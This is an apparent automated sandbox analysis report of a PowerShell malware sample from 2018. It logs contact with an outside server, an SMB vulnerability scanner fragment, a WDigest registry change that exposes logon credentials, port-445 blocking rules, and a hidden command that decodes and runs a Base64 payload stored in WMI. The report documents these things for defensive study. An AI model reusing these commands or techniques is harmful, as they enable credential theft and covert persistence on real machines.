Jun 20, 2018 20:28:18.053158998 CEST 87.121.98.215 192.168.2.2 5553 Echo Reply

HTTP Request Dependency Graph

87.121.98.215:8000

HTTP Packets

Session ID Source IP Source Port Destination IP Destination Port Process
0 192.168.2.2 49163 87.121.98.215 8000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp kBytes transferred Direction Data
Jun 20, 2018 20:28:18.456597090 CEST; 3; OUT; GET /ver.txt HTTP/1.1 Host: 87.121.98.215:8000 Connection: Keep-Alive
Jun 20, 2018 20:28:18.501296997 CEST; 3; IN; HTTP/1.1 200 OK Server: nginx/1.4.6 (Ubuntu) Date: Wed, 20 Jun 2018 18:28:11 GMT Content-Type: text/plain Content-Length: 4 Last-Modified: Fri, 15 Jun 2018 05:12:52 GMT Connection: keep-alive ETag: "5b234ad4-4" Accept-Ranges: bytes Data Raw: 31 2e 34 0a Data Ascii: 1.4
Jun 20, 2018 20:28:18.742770910 CEST; 4; IN; HTTP/1.1 200 OK Server: nginx/1.4.6 (Ubuntu) Date: Wed, 20 Jun 2018 18:28:11 GMT Content-Type: text/plain Content-Length: 4 Last-Modified: Fri, 15 Jun 2018 05:12:52 GMT Connection: keep-alive ETag: "5b234ad4-4" Accept-Ranges: bytes Data Raw: 31 2e 34 0a Data Ascii: 1.4

Code Manipulations

Statistics

Behavior

• powershell.exe • netsh.exe • netsh.exe • netsh.exe • netsh.exe • netsh.exe • netsh.exe • schtasks.exe • powercfg.exe • powercfg.exe • powercfg.exe • NETSTAT.EXE • csc.exe • NETSTAT.EXE • cvtres.exe • powershell.exe • NETSTAT.EXE • csc.exe • cvtres.exe


System Behavior

Analysis Process: powershell.exe PID: 3384 Parent PID: 2984

General

Start time: 20:26:44
Start date: 20/06/2018
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\info6.ps1'
Imagebase: 0x21e80000
File size: 452608 bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

File Activities

File Created

Source File Path Access Attributes Options Completion Count Address Symbol
File Path: C:\Users\user\AppData\Local\Temp\rfy2neso.tmp; Access: read attributes | synchronize | generic write; Attributes: none; Options: synchronous io non alert | non directory file | open no recall; Completion: success or wait; Count: 1; Address: 16D072F; Symbol: CreateFileW
File Path: C:\Users\user\AppData\Local\Temp\rfy2neso.0.cs; Access: read attributes | synchronize | generic write; Attributes: none; Options: synchronous io non alert | non directory file | open no recall; Completion: success or wait; Count: 1; Address: 16D072F; Symbol: CreateFileW
File Path: C:\Users\user\AppData\Local\Temp\rfy2neso.dll; Access: read attributes | synchronize | generic read | generic write; Attributes: none; Options: synchronous io non alert | non directory file | open no recall; Completion: success or wait; Count: 1; Address: 16D072F; Symbol: CreateFileW
File Path: C:\Users\user\AppData\Local\Temp\rfy2neso.cmdline; Access: read attributes | synchronize | generic write; Attributes: none; Options: synchronous io non alert | non directory file | open no recall; Completion: success or wait; Count: 1; Address: 16D072F; Symbol: CreateFileW
File Path: C:\Users\user\AppData\Local\Temp\rfy2neso.out; Access: read attributes | synchronize | generic write; Attributes: none; Options: synchronous io non alert | non directory file | open no recall; Completion: success or wait; Count: 1; Address: 16D072F; Symbol: CreateFileW
File Path: C:\Users\user\AppData\Local\Temp\rfy2neso.err; Access: read attributes | synchronize | generic write; Attributes: none; Options: synchronous io non alert | non directory file | open no recall; Completion: success or wait; Count: 1; Address: 16D072F; Symbol: CreateFileW

File Deleted

Source File Path Completion Count Address Symbol
File Path: C:\Users\user\AppData\Local\Temp\rfy2neso.cmdline; Completion: success or wait; Count: 1; Address: 16D01D2; Symbol: DeleteFileW
File Path: C:\Users\user\AppData\Local\Temp\rfy2neso.dll; Completion: success or wait; Count: 1; Address: 16D01D2; Symbol: DeleteFileW
File Path: C:\Users\user\AppData\Local\Temp\rfy2neso.tmp; Completion: success or wait; Count: 1; Address: 16D01D2; Symbol: DeleteFileW
File Path: C:\Users\user\AppData\Local\Temp\rfy2neso.0.cs; Completion: success or wait; Count: 1; Address: 16D01D2; Symbol: DeleteFileW


File Written

| File Path | Offset | Length | Ascii | Completion | Count | Address | Symbol |
|---|---|---|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\rfy2neso.0.cs | unknown | 4096 | ...using System;..using System.Collections.Generic;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Net.Sockets;..using System.Text;....namespace PingCastle.Scanners..{...public class m17sc...{....static public bool Scan(stri | success or wait | 1 | 16D08E7 | WriteFile |
| C:\Users\user\AppData\Local\Temp\rfy2neso.0.cs | unknown | 1730 | der = new BinaryReader(ms);.....byte[] part1 = new byte[] {...... 0x00,0x00,0x00,0x00, ...... 0xff,0x53,0x4d,0x42, ...... 0x75, ...... 0x00, ...... 0x00, ...... 0x00,0x00, ...... 0x18, ...... 0x01,0x28, ...... 0x00,0x00, ...... 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x | success or wait | 1 | 16D08E7 | WriteFile |
| C:\Users\user\AppData\Local\Temp\rfy2neso.cmdline | unknown | 327 | .../t:library /utf8output /R:"System.dll" /R:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:"C:\Users\user\AppData\Local\Temp\rfy2neso.dll" /D:DEBUG /debug+ /optimize- | success or wait | 1 | 16D08E7 | WriteFile |
| C:\Users\user\AppData\Local\Temp\rfy2neso.out | unknown | 422 | ...C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /o | success or wait | 1 | 16D08E7 | WriteFile |

File Read

| File Path | Offset | Length | Completion | Count | Address | Symbol |
|---|---|---|---|---|---|---|
| C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4095 | success or wait | 1 | 6C9EC01C | unknown |
| C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 6304 | success or wait | 3 | 6C9EC01C | unknown |
| C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4106 | success or wait | 1 | 6C9EC01C | unknown |
| C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch | unknown | 48 | success or wait | 1 | 6C9AAC6F | ReadFile |
| C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch | unknown | 48 | success or wait | 1 | 6C9AAC6F | ReadFile |
| C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4095 | success or wait | 1 | 6C9EF210 | ReadFile |
| C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 6304 | success or wait | 3 | 6C9EF210 | ReadFile |
| C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4106 | success or wait | 1 | 6C9EF210 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml | unknown | 4096 | success or wait | 4 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml | unknown | 781 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml | unknown | 4096 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | unknown | 4096 | success or wait | 42 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | unknown | 4096 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics..ps1xml | unknown | 4096 | success or wait | 7 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | unknown | 542 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | unknown | 4096 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml | unknown | 4096 | success or wait | 6 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml | unknown | 78 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml | unknown | 4096 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | unknown | 4096 | success or wait | 7 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | unknown | 310 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | unknown | 4096 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | unknown | 4096 | success or wait | 18 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | unknown | 50 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | unknown | 4096 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | unknown | 4096 | success or wait | 7 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | unknown | 4096 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\.format.ps1xml | unknown | 4096 | success or wait | 63 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | unknown | 201 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | unknown | 4096 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | unknown | 4096 | success or wait | 22 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | unknown | 409 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | unknown | 4096 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | unknown | 4096 | success or wait | 5 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | unknown | 844 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | unknown | 4096 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | unknown | 4096 | success or wait | 5 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | unknown | 360 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | unknown | 4096 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Users\user\Desktop\info6.ps1 | unknown | 4096 | success or wait | 1041 | 16D08E7 | ReadFile |
| C:\Users\user\Desktop\info6.ps1 | unknown | 532 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Users\user\Desktop\info6.ps1 | unknown | 4096 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | unknown | 4096 | success or wait | 1 | 6CA69FDE | unknown |
| C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown |
| C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown |
| C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown |
| C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown |
| C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll | unknown | 4096 | success or wait | 1 | 6CA69FDE | unknown |
| C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown |
| C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown |
| C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown |
| C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown |
| unknown | unknown | 4096 | success or wait | 3 | 16D08E7 | ReadFile |
| unknown | unknown | 4096 | pipe broken | 2 | 16D08E7 | ReadFile |
| C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4096 | success or wait | 1 | 16D08E7 | ReadFile |
| C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4096 | success or wait | 1 | 16D08E7 | ReadFile |
| C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4096 | success or wait | 2 | 16D08E7 | ReadFile |
| C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4096 | success or wait | 1 | 16D08E7 | ReadFile |
| C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4096 | success or wait | 1 | 16D08E7 | ReadFile |
| C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4096 | success or wait | 1 | 16D08E7 | ReadFile |
| C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config | unknown | 4096 | end of file | 1 | 16D08E7 | ReadFile |
| C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | unknown | 4096 | success or wait | 1 | 6CA69FDE | unknown |
| C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown |
| C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown |
| C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown |
| C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | unknown | 512 | success or wait | 1 | 6CA69FDE | unknown |

Registry Activities


Key Value Created

| Key Path | Name | Type | Data | Completion | Count | Address | Symbol |
|---|---|---|---|---|---|---|---|
| HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest | UseLogonCredential | dword | 1 | success or wait | 1 | 16D4F7A | RegSetValueExW |

Analysis Process: netsh.exe PID: 3604 Parent PID: 3384

General

Start time: 20:27:26
Start date: 20/06/2018
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add policy name=netbc
Imagebase: 0x1690000
File size: 96256 bytes
MD5 hash: 784A50A6A09C25F011C3143DDD68E729
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Registry Activities


Analysis Process: netsh.exe PID: 3620 Parent PID: 3384

General

Start time: 20:27:27
Start date: 20/06/2018
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add filterlist name=block
Imagebase: 0x1690000
File size: 96256 bytes
MD5 hash: 784A50A6A09C25F011C3143DDD68E729
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Registry Activities


Analysis Process: netsh.exe PID: 3648 Parent PID: 3384

General

Start time: 20:27:28
Start date: 20/06/2018
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add filteraction name=block action=block
Imagebase: 0x1690000
File size: 96256 bytes
MD5 hash: 784A50A6A09C25F011C3143DDD68E729
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: netsh.exe PID: 3696 Parent PID: 3384

General

Start time: 20:27:28
Start date: 20/06/2018
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445
Imagebase: 0x1690000
File size: 96256 bytes
MD5 hash: 784A50A6A09C25F011C3143DDD68E729
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: netsh.exe PID: 3716 Parent PID: 3384

General

Start time: 20:27:29
Start date: 20/06/2018
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\netsh.exe' ipsec static add rule name=block policy=netbc filterlist=block filteraction=block
Imagebase: 0x1690000
File size: 96256 bytes
MD5 hash: 784A50A6A09C25F011C3143DDD68E729
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: netsh.exe PID: 3748 Parent PID: 3384

General

Start time: 20:27:29
Start date: 20/06/2018
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\netsh.exe' ipsec static set policy name=netbc assign=y
Imagebase: 0x1690000
File size: 96256 bytes
MD5 hash: 784A50A6A09C25F011C3143DDD68E729
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: schtasks.exe PID: 3940 Parent PID: 3384

General

Start time: 20:27:43
Start date: 20/06/2018
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\schtasks.exe' /delete /tn yastcat /f
Imagebase: 0xb00000
File size: 179712 bytes
MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: powercfg.exe PID: 3952 Parent PID: 3384

General

Start time: 20:27:43
Start date: 20/06/2018
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\powercfg.exe' /CHANGE -standby-timeout-ac 0
Imagebase: 0xdc0000
File size: 59392 bytes
MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Analysis Process: powercfg.exe PID: 3960 Parent PID: 3384

General

Start time: 20:27:44
Start date: 20/06/2018
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\powercfg.exe' /CHANGE -hibernate-timeout-ac 0
Imagebase: 0xdc0000
File size: 59392 bytes
MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Analysis Process: powercfg.exe PID: 3968 Parent PID: 3384

General

Start time: 20:27:44
Start date: 20/06/2018
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
Imagebase: 0xdc0000
File size: 59392 bytes
MD5 hash: 98E7E971AB21A6EDD2323C0FB37B9A0F
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Analysis Process: NETSTAT.EXE PID: 3980 Parent PID: 3384

General

Start time: 20:27:45
Start date: 20/06/2018
Path: C:\Windows\System32\NETSTAT.EXE
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp
Imagebase: 0xf10000
File size: 27136 bytes
MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: csc.exe PID: 2140 Parent PID: 3384

General

Start time: 20:28:06
Start date: 20/06/2018
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rfy2neso.cmdline'
Imagebase: 0x400000
File size: 77960 bytes
MD5 hash: 0A1C81BDCB030222A0B0A652B2C89D8D
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: moderate

Analysis Process: NETSTAT.EXE PID: 2180 Parent PID: 3384

General

Start time: 20:28:06
Start date: 20/06/2018
Path: C:\Windows\System32\NETSTAT.EXE
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp
Imagebase: 0xad0000
File size: 27136 bytes
MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: cvtres.exe PID: 2212 Parent PID: 2140

General

Start time: 20:28:07
Start date: 20/06/2018
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RES501D.tmp' 'c:\Users\user\AppData\Local\Temp\CSC4E3C.tmp'
Imagebase: 0x400000
File size: 32912 bytes
MD5 hash: 200FC355F85ECD4DB77FB3CAB2D01364
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: powershell.exe PID: 2524 Parent PID: 3384

General

Start time: 20:28:08
Start date: 20/06/2018
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden '$mon = ([WmiClass] 'root\default:coredpussvr').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:coredpussvr').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')'
Imagebase: 0x21e80000
File size: 452608 bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Analysis Process: NETSTAT.EXE PID: 2696 Parent PID: 3384

General

Start time: 20:28:27
Start date: 20/06/2018
Path: C:\Windows\System32\NETSTAT.EXE
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp
Imagebase: 0xe30000
File size: 27136 bytes
MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: csc.exe PID: 2644 Parent PID: 2524

General

Start time: 20:28:40
Start date: 20/06/2018
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cvkkx-1q.cmdline'
Imagebase: 0x400000
File size: 77960 bytes
MD5 hash: 0A1C81BDCB030222A0B0A652B2C89D8D
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: moderate

Analysis Process: cvtres.exe PID: 2060 Parent PID: 2644

General

Start time: 20:28:41
Start date: 20/06/2018
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL~1\AppData\Local\Temp\RESD500.tmp' 'c:\Users\user\AppData\Local\Temp\CSCD405.tmp'
Imagebase: 0x400000
File size: 32912 bytes
MD5 hash: 200FC355F85ECD4DB77FB3CAB2D01364
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Disassembly

Code Analysis
